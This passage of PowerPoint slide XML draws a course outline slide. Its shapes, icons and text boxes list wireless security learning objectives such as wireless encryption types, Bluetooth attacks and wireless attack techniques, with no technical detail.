            <a:off x="7900848" y="2514600"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
          <a:ln w="381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" name="Oval 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8782072" y="4207543"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="381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B9016AFD-5B5A-4813-A53E-5D4C3615CEC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8578635" y="2476299"/>
            <a:ext cx="2897085" cy="69403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>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discuss Different Types of Wireless Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700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B14C850-384D-43ED-A074-9D81FF2B7B8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9430979" y="4194087"/>
            <a:ext cx="2532421" cy="69403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>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Understand Bluetooth Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700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4F181BEB-E04A-42A9-9AC7-2704A1A580BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="496386" y="3264450"/>
            <a:ext cx="3083372" cy="69403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 algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discuss Wireless Network-Specific Attack Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700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178D3AB4-6CCD-4627-81A0-952F323A0B73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1942730" y="1637194"/>
            <a:ext cx="2418764" cy="61555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 algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Understand Wireless Terminology</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700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</a:endParaRPr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7CEA977D-F9E3-49EA-AA26-D48AC44B87B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4414470" y="1669051"/>
            <a:ext cx="551839" cy="551839"/>
            <a:chOff x="4150833" y="1613610"/>
            <a:chExt cx="551839" cy="551839"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="106" name="Oval 105"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4150833" y="1613610"/>
              <a:ext cx="551839" cy="551839"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:ln w="38100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" name="Freeform 167">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86753C4D-EE69-4971-84FE-58F31E5B7B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82955" y="1737961"/>
              <a:ext cx="285358" cy="296356"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 198438 w 58"/>
                <a:gd name="T1" fmla="*/ 162089 h 58"/>
                <a:gd name="T2" fmla="*/ 160803 w 58"/>
                <a:gd name="T3" fmla="*/ 200025 h 58"/>
                <a:gd name="T4" fmla="*/ 37635 w 58"/>
                <a:gd name="T5" fmla="*/ 200025 h 58"/>
                <a:gd name="T6" fmla="*/ 0 w 58"/>
                <a:gd name="T7" fmla="*/ 162089 h 58"/>
                <a:gd name="T8" fmla="*/ 0 w 58"/>
                <a:gd name="T9" fmla="*/ 34487 h 58"/>
                <a:gd name="T10" fmla="*/ 37635 w 58"/>
                <a:gd name="T11" fmla="*/ 0 h 58"/>
                <a:gd name="T12" fmla="*/ 160803 w 58"/>
                <a:gd name="T13" fmla="*/ 0 h 58"/>
                <a:gd name="T14" fmla="*/ 198438 w 58"/>
                <a:gd name="T15" fmla="*/ 34487 h 58"/>
                <a:gd name="T16" fmla="*/ 198438 w 58"/>
                <a:gd name="T17" fmla="*/ 162089 h 58"/>
                <a:gd name="T18" fmla="*/ 167646 w 58"/>
                <a:gd name="T19" fmla="*/ 72423 h 58"/>
                <a:gd name="T20" fmla="*/ 167646 w 58"/>
                <a:gd name="T21" fmla="*/ 58628 h 58"/>
                <a:gd name="T22" fmla="*/ 153961 w 58"/>
                <a:gd name="T23" fmla="*/ 44833 h 58"/>
                <a:gd name="T24" fmla="*/ 143696 w 58"/>
                <a:gd name="T25" fmla="*/ 44833 h 58"/>
                <a:gd name="T26" fmla="*/ 82112 w 58"/>
                <a:gd name="T27" fmla="*/ 106910 h 58"/>
                <a:gd name="T28" fmla="*/ 54742 w 58"/>
                <a:gd name="T29" fmla="*/ 79320 h 58"/>
                <a:gd name="T30" fmla="*/ 44477 w 58"/>
                <a:gd name="T31" fmla="*/ 79320 h 58"/>
                <a:gd name="T32" fmla="*/ 30792 w 58"/>
                <a:gd name="T33" fmla="*/ 93115 h 58"/>
                <a:gd name="T34" fmla="*/ 30792 w 58"/>
                <a:gd name="T35" fmla="*/ 103461 h 58"/>
                <a:gd name="T36" fmla="*/ 75270 w 58"/>
                <a:gd name="T37" fmla="*/ 151743 h 58"/>
                <a:gd name="T38" fmla="*/ 88955 w 58"/>
                <a:gd name="T39" fmla="*/ 151743 h 58"/>
                <a:gd name="T40" fmla="*/ 167646 w 58"/>
                <a:gd name="T41" fmla="*/ 72423 h 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8" h="58">
                  <a:moveTo>
                    <a:pt x="58" y="47"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="53"/>
                    <a:pt x="53" y="58"/>
                    <a:pt x="47" y="58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5" y="58"/>
                    <a:pt x="0" y="53"/>
                    <a:pt x="0" y="4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53" y="0"/>
                    <a:pt x="58" y="4"/>
                    <a:pt x="58" y="10"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="58" y="47"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="49" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="20"/>
                    <a:pt x="50" y="18"/>
                    <a:pt x="49" y="17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4" y="12"/>
                    <a:pt x="43" y="12"/>
                    <a:pt x="42" y="13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4" y="22"/>
                    <a:pt x="13" y="23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8"/>
                    <a:pt x="8" y="29"/>
                    <a:pt x="9" y="30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3" y="45"/>
                    <a:pt x="25" y="45"/>
                    <a:pt x="26" y="44"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="49" y="2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/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Freeform 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D00080F5-AB70-4A18-96ED-06D761FEA3B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3729092" y="3468970"/>
            <a:ext cx="354131" cy="303951"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 142082 w 178"/>
              <a:gd name="T1" fmla="*/ 0 h 168"/>
              <a:gd name="T2" fmla="*/ 284163 w 178"/>
              <a:gd name="T3" fmla="*/ 60684 h 168"/>
              <a:gd name="T4" fmla="*/ 260217 w 178"/>
              <a:gd name="T5" fmla="*/ 91026 h 168"/>
              <a:gd name="T6" fmla="*/ 142082 w 178"/>
              <a:gd name="T7" fmla="*/ 38327 h 168"/>
              <a:gd name="T8" fmla="*/ 23946 w 178"/>
              <a:gd name="T9" fmla="*/ 91026 h 168"/>
              <a:gd name="T10" fmla="*/ 0 w 178"/>
              <a:gd name="T11" fmla="*/ 60684 h 168"/>
              <a:gd name="T12" fmla="*/ 142082 w 178"/>
              <a:gd name="T13" fmla="*/ 0 h 168"/>
              <a:gd name="T14" fmla="*/ 142082 w 178"/>
              <a:gd name="T15" fmla="*/ 95817 h 168"/>
              <a:gd name="T16" fmla="*/ 225095 w 178"/>
              <a:gd name="T17" fmla="*/ 138934 h 168"/>
              <a:gd name="T18" fmla="*/ 204342 w 178"/>
              <a:gd name="T19" fmla="*/ 166082 h 168"/>
              <a:gd name="T20" fmla="*/ 142082 w 178"/>
              <a:gd name="T21" fmla="*/ 134144 h 168"/>
              <a:gd name="T22" fmla="*/ 79821 w 178"/>
              <a:gd name="T23" fmla="*/ 166082 h 168"/>
              <a:gd name="T24" fmla="*/ 59068 w 178"/>
              <a:gd name="T25" fmla="*/ 138934 h 168"/>
              <a:gd name="T26" fmla="*/ 142082 w 178"/>
              <a:gd name="T27" fmla="*/ 95817 h 168"/>
              <a:gd name="T28" fmla="*/ 142082 w 178"/>
              <a:gd name="T29" fmla="*/ 191634 h 168"/>
              <a:gd name="T30" fmla="*/ 180396 w 178"/>
              <a:gd name="T31" fmla="*/ 229960 h 168"/>
              <a:gd name="T32" fmla="*/ 142082 w 178"/>
              <a:gd name="T33" fmla="*/ 268287 h 168"/>
              <a:gd name="T34" fmla="*/ 103767 w 178"/>
              <a:gd name="T35" fmla="*/ 229960 h 168"/>
              <a:gd name="T36" fmla="*/ 142082 w 178"/>
              <a:gd name="T37" fmla="*/ 191634 h 16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78" h="168">
                <a:moveTo>
                  <a:pt x="89" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="0"/>
                  <a:pt x="156" y="15"/>
                  <a:pt x="178" y="38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45" y="37"/>
                  <a:pt x="119" y="24"/>
                  <a:pt x="89" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="24"/>
                  <a:pt x="33" y="37"/>
                  <a:pt x="15" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="38"/>
                  <a:pt x="0" y="38"/>
                  <a:pt x="0" y="38"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="15"/>
                  <a:pt x="54" y="0"/>
                  <a:pt x="89" y="0"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="89" y="60"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="60"/>
                  <a:pt x="129" y="71"/>
                  <a:pt x="141" y="87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19" y="92"/>
                  <a:pt x="105" y="84"/>
                  <a:pt x="89" y="84"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="84"/>
                  <a:pt x="59" y="92"/>
                  <a:pt x="50" y="104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="87"/>
                  <a:pt x="37" y="87"/>
                  <a:pt x="37" y="87"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="71"/>
                  <a:pt x="68" y="60"/>
                  <a:pt x="89" y="60"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="89" y="120"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="102" y="120"/>
                  <a:pt x="113" y="131"/>
                  <a:pt x="113" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113" y="157"/>
                  <a:pt x="102" y="168"/>
                  <a:pt x="89" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76" y="168"/>
                  <a:pt x="65" y="157"/>
                  <a:pt x="65" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="131"/>
                  <a:pt x="76" y="120"/>
                  <a:pt x="89" y="120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09" name="Freeform 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EEA836F-6FC0-4F24-B06E-5ADA0E3ACA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281" y="5000730"/>
            <a:ext cx="291473" cy="313875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 51370 w 462"/>
              <a:gd name="T1" fmla="*/ 67883 h 452"/>
              <a:gd name="T2" fmla="*/ 83086 w 462"/>
              <a:gd name="T3" fmla="*/ 43607 h 452"/>
              <a:gd name="T4" fmla="*/ 83086 w 462"/>
              <a:gd name="T5" fmla="*/ 31469 h 452"/>
              <a:gd name="T6" fmla="*/ 19655 w 462"/>
              <a:gd name="T7" fmla="*/ 39561 h 452"/>
              <a:gd name="T8" fmla="*/ 51370 w 462"/>
              <a:gd name="T9" fmla="*/ 67883 h 452"/>
              <a:gd name="T10" fmla="*/ 27695 w 462"/>
              <a:gd name="T11" fmla="*/ 87664 h 452"/>
              <a:gd name="T12" fmla="*/ 11614 w 462"/>
              <a:gd name="T13" fmla="*/ 55745 h 452"/>
              <a:gd name="T14" fmla="*/ 15634 w 462"/>
              <a:gd name="T15" fmla="*/ 151051 h 452"/>
              <a:gd name="T16" fmla="*/ 27695 w 462"/>
              <a:gd name="T17" fmla="*/ 87664 h 452"/>
              <a:gd name="T18" fmla="*/ 102741 w 462"/>
              <a:gd name="T19" fmla="*/ 15735 h 452"/>
              <a:gd name="T20" fmla="*/ 154558 w 462"/>
              <a:gd name="T21" fmla="*/ 11688 h 452"/>
              <a:gd name="T22" fmla="*/ 67452 w 462"/>
              <a:gd name="T23" fmla="*/ 3596 h 452"/>
              <a:gd name="T24" fmla="*/ 102741 w 462"/>
              <a:gd name="T25" fmla="*/ 15735 h 452"/>
              <a:gd name="T26" fmla="*/ 134456 w 462"/>
              <a:gd name="T27" fmla="*/ 119582 h 452"/>
              <a:gd name="T28" fmla="*/ 110781 w 462"/>
              <a:gd name="T29" fmla="*/ 59342 h 452"/>
              <a:gd name="T30" fmla="*/ 91127 w 462"/>
              <a:gd name="T31" fmla="*/ 55745 h 452"/>
              <a:gd name="T32" fmla="*/ 71472 w 462"/>
              <a:gd name="T33" fmla="*/ 87664 h 452"/>
              <a:gd name="T34" fmla="*/ 134456 w 462"/>
              <a:gd name="T35" fmla="*/ 119582 h 452"/>
              <a:gd name="T36" fmla="*/ 162152 w 462"/>
              <a:gd name="T37" fmla="*/ 147005 h 452"/>
              <a:gd name="T38" fmla="*/ 162152 w 462"/>
              <a:gd name="T39" fmla="*/ 182970 h 452"/>
              <a:gd name="T40" fmla="*/ 174213 w 462"/>
              <a:gd name="T41" fmla="*/ 135317 h 452"/>
              <a:gd name="T42" fmla="*/ 130436 w 462"/>
              <a:gd name="T43" fmla="*/ 135317 h 452"/>
              <a:gd name="T44" fmla="*/ 63431 w 462"/>
              <a:gd name="T45" fmla="*/ 107444 h 452"/>
              <a:gd name="T46" fmla="*/ 47797 w 462"/>
              <a:gd name="T47" fmla="*/ 107444 h 452"/>
              <a:gd name="T48" fmla="*/ 63431 w 462"/>
              <a:gd name="T49" fmla="*/ 195108 h 452"/>
              <a:gd name="T50" fmla="*/ 170192 w 462"/>
              <a:gd name="T51" fmla="*/ 23827 h 452"/>
              <a:gd name="T52" fmla="*/ 122842 w 462"/>
              <a:gd name="T53" fmla="*/ 35515 h 452"/>
              <a:gd name="T54" fmla="*/ 122842 w 462"/>
              <a:gd name="T55" fmla="*/ 47653 h 452"/>
              <a:gd name="T56" fmla="*/ 174213 w 462"/>
              <a:gd name="T57" fmla="*/ 119582 h 452"/>
              <a:gd name="T58" fmla="*/ 205928 w 462"/>
              <a:gd name="T59" fmla="*/ 99352 h 452"/>
              <a:gd name="T60" fmla="*/ 142497 w 462"/>
              <a:gd name="T61" fmla="*/ 147005 h 452"/>
              <a:gd name="T62" fmla="*/ 79066 w 462"/>
              <a:gd name="T63" fmla="*/ 199154 h 452"/>
              <a:gd name="T64" fmla="*/ 146517 w 462"/>
              <a:gd name="T65" fmla="*/ 195108 h 452"/>
              <a:gd name="T66" fmla="*/ 146517 w 462"/>
              <a:gd name="T67" fmla="*/ 151051 h 45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62" h="452">
                <a:moveTo>
                  <a:pt x="115" y="151"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="115" y="151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="151"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="142" y="132"/>
                  <a:pt x="160" y="115"/>
                  <a:pt x="186" y="97"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="186" y="88"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="79"/>
                  <a:pt x="186" y="79"/>
                  <a:pt x="186" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="53"/>
                  <a:pt x="133" y="44"/>
                  <a:pt x="107" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="44"/>
                  <a:pt x="62" y="62"/>
                  <a:pt x="44" y="88"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="115"/>
                  <a:pt x="71" y="132"/>
                  <a:pt x="89" y="151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="98" y="151"/>
                  <a:pt x="107" y="151"/>
                  <a:pt x="115" y="151"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="62" y="195"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="62" y="195"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="186"/>
                  <a:pt x="62" y="186"/>
                  <a:pt x="71" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="160"/>
                  <a:pt x="35" y="141"/>
                  <a:pt x="26" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="151"/>
                  <a:pt x="0" y="186"/>
                  <a:pt x="0" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="266"/>
                  <a:pt x="9" y="310"/>
                  <a:pt x="35" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="301"/>
                  <a:pt x="54" y="257"/>
                  <a:pt x="71" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="221"/>
                  <a:pt x="62" y="204"/>
                  <a:pt x="62" y="195"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="230" y="35"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="230" y="35"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="35"/>
                  <a:pt x="257" y="44"/>
                  <a:pt x="266" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="292" y="35"/>
                  <a:pt x="319" y="35"/>
                  <a:pt x="346" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="8"/>
                  <a:pt x="275" y="0"/>
                  <a:pt x="230" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="0"/>
                  <a:pt x="177" y="0"/>
                  <a:pt x="151" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="17"/>
                  <a:pt x="186" y="35"/>
                  <a:pt x="204" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="44"/>
                  <a:pt x="221" y="35"/>
                  <a:pt x="230" y="35"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="301" y="266"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="301" y="266"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="257"/>
                  <a:pt x="310" y="257"/>
                  <a:pt x="319" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="301" y="204"/>
                  <a:pt x="275" y="168"/>
                  <a:pt x="248" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="248" y="132"/>
                  <a:pt x="239" y="132"/>
                  <a:pt x="230" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="221" y="132"/>
                  <a:pt x="213" y="132"/>
                  <a:pt x="204" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="141"/>
                  <a:pt x="168" y="151"/>
                  <a:pt x="151" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="177"/>
                  <a:pt x="160" y="186"/>
                  <a:pt x="160" y="195"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="204"/>
                  <a:pt x="160" y="204"/>
                  <a:pt x="160" y="213"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="239"/>
                  <a:pt x="248" y="257"/>
                  <a:pt x="301" y="266"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="363" y="327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="363" y="327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="336"/>
                  <a:pt x="363" y="354"/>
                  <a:pt x="363" y="363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="372"/>
                  <a:pt x="363" y="389"/>
                  <a:pt x="363" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="380"/>
                  <a:pt x="434" y="336"/>
                  <a:pt x="443" y="292"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="426" y="301"/>
                  <a:pt x="408" y="301"/>
                  <a:pt x="390" y="301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="390" y="319"/>
                  <a:pt x="381" y="327"/>
                  <a:pt x="363" y="327"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="292" y="301"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="292" y="301"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="292"/>
                  <a:pt x="186" y="266"/>
                  <a:pt x="142" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="133" y="239"/>
                  <a:pt x="124" y="248"/>
                  <a:pt x="115" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="248"/>
                  <a:pt x="107" y="248"/>
                  <a:pt x="107" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="283"/>
                  <a:pt x="71" y="327"/>
                  <a:pt x="62" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="398"/>
                  <a:pt x="115" y="425"/>
                  <a:pt x="142" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="380"/>
                  <a:pt x="230" y="327"/>
                  <a:pt x="292" y="301"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="381" y="53"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="381" y="53"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="346" y="62"/>
                  <a:pt x="310" y="70"/>
                  <a:pt x="275" y="79"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="283" y="88"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="283" y="97"/>
                  <a:pt x="275" y="97"/>
                  <a:pt x="275" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="141"/>
                  <a:pt x="328" y="186"/>
                  <a:pt x="346" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="239"/>
                  <a:pt x="381" y="248"/>
                  <a:pt x="390" y="266"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="417" y="266"/>
                  <a:pt x="434" y="266"/>
                  <a:pt x="452" y="257"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461" y="248"/>
                  <a:pt x="461" y="230"/>
                  <a:pt x="461" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461" y="160"/>
                  <a:pt x="426" y="97"/>
                  <a:pt x="381" y="53"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="319" y="327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="319" y="327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="257" y="354"/>
                  <a:pt x="213" y="389"/>
                  <a:pt x="177" y="443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195" y="451"/>
                  <a:pt x="213" y="451"/>
                  <a:pt x="230" y="451"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="451"/>
                  <a:pt x="292" y="443"/>
                  <a:pt x="328" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="407"/>
                  <a:pt x="337" y="380"/>
                  <a:pt x="337" y="363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="337" y="354"/>
                  <a:pt x="337" y="345"/>
                  <a:pt x="328" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="327"/>
                  <a:pt x="319" y="327"/>
                  <a:pt x="319" y="3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lIns="34290" tIns="17145" rIns="34290" bIns="17145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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Freeform 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{854E4B31-FC87-4904-AF59-18E894A73CE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8923113" y="4301357"/>
            <a:ext cx="275459" cy="336378"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 226881 w 144"/>
              <a:gd name="T1" fmla="*/ 129977 h 256"/>
              <a:gd name="T2" fmla="*/ 226881 w 144"/>
              <a:gd name="T3" fmla="*/ 129977 h 256"/>
              <a:gd name="T4" fmla="*/ 150714 w 144"/>
              <a:gd name="T5" fmla="*/ 207963 h 256"/>
              <a:gd name="T6" fmla="*/ 226881 w 144"/>
              <a:gd name="T7" fmla="*/ 285948 h 256"/>
              <a:gd name="T8" fmla="*/ 233363 w 144"/>
              <a:gd name="T9" fmla="*/ 298946 h 256"/>
              <a:gd name="T10" fmla="*/ 226881 w 144"/>
              <a:gd name="T11" fmla="*/ 311944 h 256"/>
              <a:gd name="T12" fmla="*/ 129646 w 144"/>
              <a:gd name="T13" fmla="*/ 409426 h 256"/>
              <a:gd name="T14" fmla="*/ 116682 w 144"/>
              <a:gd name="T15" fmla="*/ 415925 h 256"/>
              <a:gd name="T16" fmla="*/ 97235 w 144"/>
              <a:gd name="T17" fmla="*/ 396429 h 256"/>
              <a:gd name="T18" fmla="*/ 97235 w 144"/>
